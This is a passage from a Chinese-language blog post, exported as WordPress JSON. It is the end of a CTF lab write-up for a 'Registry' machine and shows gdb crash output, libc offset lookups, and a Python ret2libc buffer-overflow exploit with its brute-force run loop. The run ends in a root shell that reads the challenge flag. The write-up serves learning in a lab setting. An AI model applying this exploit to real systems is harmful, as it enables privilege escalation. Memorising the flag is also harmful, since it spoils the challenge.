--&gt; 0x0 \nEBP: 0x41514141 (&#039;AAQA&#039;)\nESP: 0xffc83790 (&quot;RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\nEIP: 0x41416d41 (&#039;AmAA&#039;)\nEFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\nInvalid $PC address: 0x41416d41\n[------------------------------------stack-------------------------------------]\n0000| 0xffc83790 (&quot;RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0004| 0xffc83794 (&quot;AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0008| 0xffc83798 (&quot;ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0012| 0xffc8379c (&quot;TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0016| 0xffc837a0 (&quot;AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0020| 0xffc837a4 (&quot;ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0024| 0xffc837a8 (&quot;VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0028| 0xffc837ac (&quot;AAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x41416d41 in ?? ()\ngdb-peda$ pattern_offset 0x41416d41\n1094806849 found at offset: 140<\/code><\/pre>\n<p>\u6309\u7167\u4f5c\u8005\u7684\u505a\u6cd5\uff0c\u770b\u4e86\u8fd9\u4e9b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/opt\/fixed$ ldd new\n        linux-gate.so.1 (0xf7f9b000)\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7c8f000)\n        \/lib\/ld-linux.so.2 (0xf7f9d000)\n(remote) gato@registry:\/opt\/fixed$ readelf -s \/lib\/i386-linux-gnu\/libc.so.6 | grep -E &quot; system| exit&quot;\n   460: 0003a460    39 FUNC    GLOBAL DEFAULT   15 exit@@GLIBC_2.0\n  2166: 00048170    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0\n(remote) gato@registry:\/opt\/fixed$ strings -a -t x \/lib\/i386-linux-gnu\/libc.so.6  | grep \/bin\/sh\n 1bd0d5 \/bin\/sh<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u7f16\u5199\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python2\nfrom pwn import p32\n\noffset = 140\njunk = b&quot;A&quot; * offset\nlibc = 0xf7c8f000\nsystem_addr = p32(libc + 0x00048170)\nexit_addr = p32(libc + 0x0003a460)\nbin_sh_addr = p32(libc + 0x001bd0d5)\n\npayload = junk + system_addr + exit_addr + bin_sh_addr\nprint(payload)<\/code><\/pre>\n<p>\u7136\u540e\u8fd0\u884c\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/opt\/fixed$ cd \/tmp\n(remote) gato@registry:\/tmp$ nano exp.py\n(remote) gato@registry:\/tmp$ chmod +x exp.py\n(remote) gato@registry:\/tmp$ while :; do \/opt\/fixed\/new $(python2 exp.py); done\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\n.......<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158506.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158506.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706015706068\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u4e0b\uff0c\u54c8\u54c8\u54c8\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">root@registry:\/root# ls -la\ntotal 40\ndrwx------  7 root root 4096 Jul 24  2023 .\ndrwxr-xr-x 19 root root 4096 Jul 24  2023 ..\nlrwxrwxrwx  1 root root    9 Jul 24  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3813 Jul 24  2023 .bashrc\ndrwx------  4 root root 4096 Jul 24  2023 .cache\ndrwxr-xr-x  3 root root 4096 Jul 24  2023 .config\ndrwxr-xr-x  3 root root 4096 Jul 24  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root    0 Jul 24  2023 .python_history\ndrwx------  2 root root 4096 Jul 24  2023 .ssh\ndrwxr-xr-x  4 root root 4096 Jul 24  2023 .wine\n-rw-r--r--  1 root root   39 Jul 24  2023 root.txt\nroot@registry:\/root# cat root.txt \nREGISTRY{7H3_BUFF3R_0V3RF10W_15_FUNNY}<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/lander4k.github.io\/posts\/HMVM-Registry\/\">https:\/\/lander4k.github.io\/posts\/HMVM-Registry\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Registry \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.153 &#8212; -A Open [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-714","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=714"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/714\/revisions"}],"predecessor-version":[{"id":715,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/714\/revisions\/715"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=714"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}